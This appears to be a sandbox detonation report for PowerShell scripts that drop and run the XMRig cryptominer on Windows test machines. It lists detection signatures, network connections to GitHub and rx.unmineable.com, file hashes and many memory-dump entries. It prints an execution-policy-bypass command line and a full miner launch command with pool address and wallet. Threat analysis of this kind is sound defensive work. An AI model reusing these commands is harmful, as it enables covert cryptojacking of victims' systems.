Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 122.10.44.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3zi5k5zq.ko1.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral24

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:52

Platform

win11-20240508-en

Max time kernel

1789s

Max time network

1781s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 52.111.227.14:443 tcp

Files

memory/1932-0-0x00007FFEE6673000-0x00007FFEE6675000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5fk42c0v.lqg.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1932-9-0x000001BBE9780000-0x000001BBE97A2000-memory.dmp

memory/1932-10-0x00007FFEE6670000-0x00007FFEE7132000-memory.dmp

memory/1932-11-0x00007FFEE6670000-0x00007FFEE7132000-memory.dmp

memory/1932-12-0x00007FFEE6670000-0x00007FFEE7132000-memory.dmp

memory/1932-14-0x000001BBE9820000-0x000001BBE9832000-memory.dmp

memory/1932-15-0x000001BBE9810000-0x000001BBE981A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1904-46-0x0000022F20830000-0x0000022F20850000-memory.dmp

memory/1904-47-0x0000022F22220000-0x0000022F22240000-memory.dmp

memory/1904-48-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-49-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-52-0x0000022FB4E00000-0x0000022FB4E20000-memory.dmp

memory/1932-50-0x00007FFEE6670000-0x00007FFEE7132000-memory.dmp

memory/1904-51-0x0000022FB4BD0000-0x0000022FB4BF0000-memory.dmp

memory/1932-53-0x00007FFEE6673000-0x00007FFEE6675000-memory.dmp

memory/1904-54-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-55-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-56-0x0000022FB4BD0000-0x0000022FB4BF0000-memory.dmp

memory/1904-57-0x0000022FB4E00000-0x0000022FB4E20000-memory.dmp

memory/1904-58-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-59-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-60-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-61-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-62-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-63-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-64-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-65-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-66-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-67-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-68-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-69-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-70-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-71-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-72-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-73-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-74-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-75-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-76-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-77-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-78-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-79-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-80-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-81-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-82-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-83-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-84-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-85-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-86-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-87-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-88-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-89-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-90-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-91-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-92-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-93-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-94-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-95-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-96-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-97-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-98-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-99-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-100-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-101-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-102-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-103-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-104-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-105-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-106-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-107-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-108-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-109-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-110-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-111-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-112-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-113-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-114-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-115-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

memory/1904-116-0x00007FF7BCBE0000-0x00007FF7BD813000-memory.dmp

Analysis: behavioral28

Detonation Overview

Submitted 2024-05-26 13:33

Reported 2024-05-27 06:53

Platform win11-20240426-en

Max time kernel 1798s

Max time network 1789s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
(64 indicator rows, all N/A N/A N/A N/A)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 52.111.229.48:443 tcp

Files

memory/3856-0-0x00007FFA4ADF3000-0x00007FFA4ADF5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tkbi35ku.lzv.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3856-9-0x00000149FC0B0000-0x00000149FC0D2000-memory.dmp

memory/3856-10-0x00007FFA4ADF0000-0x00007FFA4B8B2000-memory.dmp

memory/3856-11-0x00007FFA4ADF0000-0x00007FFA4B8B2000-memory.dmp

memory/3856-12-0x00007FFA4ADF0000-0x00007FFA4B8B2000-memory.dmp

memory/3856-14-0x00000149FC5C0000-0x00000149FC5D2000-memory.dmp

memory/3856-15-0x00000149FC4A0000-0x00000149FC4AA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1812-46-0x000001980C490000-0x000001980C4B0000-memory.dmp

memory/1812-47-0x000001980DE70000-0x000001980DE90000-memory.dmp

memory/1812-48-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/3856-50-0x00007FFA4ADF3000-0x00007FFA4ADF5000-memory.dmp

memory/1812-49-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-53-0x000001980DEB0000-0x000001980DED0000-memory.dmp

memory/1812-52-0x000001980DE90000-0x000001980DEB0000-memory.dmp

memory/3856-51-0x00007FFA4ADF0000-0x00007FFA4B8B2000-memory.dmp

memory/1812-54-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-55-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-57-0x000001980DEB0000-0x000001980DED0000-memory.dmp

memory/1812-56-0x000001980DE90000-0x000001980DEB0000-memory.dmp

memory/1812-58-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-59-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-60-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-61-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-62-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-63-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-64-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-65-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-66-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-67-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-68-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-69-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-70-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-71-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-72-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-73-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-74-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-75-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-76-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-77-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-78-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-79-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-80-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-81-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-82-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-83-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-84-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-85-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-86-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-87-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-88-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-89-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-90-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-91-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-92-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-93-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-94-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-95-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-96-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-97-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-98-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-99-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-100-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-101-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-102-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-103-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-104-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-105-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-106-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-107-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-108-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-109-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-110-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-111-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-112-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-113-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-114-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-115-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

memory/1812-116-0x00007FF6087E0000-0x00007FF609413000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted 2024-05-26 13:33

Reported 2024-05-27 06:32

Platform win10v2004-20240508-en

Max time kernel 1790s

Max time network 1791s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
(64 indicator rows, all N/A N/A N/A N/A)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 17.173.189.20.in-addr.arpa udp

Files

memory/4296-0-0x00007FFE444A3000-0x00007FFE444A5000-memory.dmp

memory/4296-1-0x000001C0B0350000-0x000001C0B0372000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i1op1n3s.n2b.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4296-11-0x00007FFE444A0000-0x00007FFE44F61000-memory.dmp

memory/4296-12-0x00007FFE444A0000-0x00007FFE44F61000-memory.dmp

memory/4296-14-0x00007FFE444A0000-0x00007FFE44F61000-memory.dmp

memory/4296-15-0x000001C0B06E0000-0x000001C0B06F2000-memory.dmp

memory/4296-16-0x000001C0B06D0000-0x000001C0B06DA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4552-47-0x0000020EFC3B0000-0x0000020EFC3D0000-memory.dmp

memory/4552-48-0x0000020EFDEC0000-0x0000020EFDEE0000-memory.dmp

memory/4552-49-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4296-50-0x00007FFE444A3000-0x00007FFE444A5000-memory.dmp

memory/4296-51-0x00007FFE444A0000-0x00007FFE44F61000-memory.dmp

memory/4552-53-0x0000020F90AB0000-0x0000020F90AD0000-memory.dmp

memory/4552-52-0x0000020F90A90000-0x0000020F90AB0000-memory.dmp

memory/4552-54-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-55-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4296-56-0x00007FFE444A0000-0x00007FFE44F61000-memory.dmp

memory/4552-59-0x0000020F90AB0000-0x0000020F90AD0000-memory.dmp

memory/4552-58-0x0000020F90A90000-0x0000020F90AB0000-memory.dmp

memory/4552-57-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-60-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-61-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-62-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-63-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-64-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-65-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-66-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

memory/4552-67-0x00007FF70BA80000-0x00007FF70C6B3000-memory.dmp

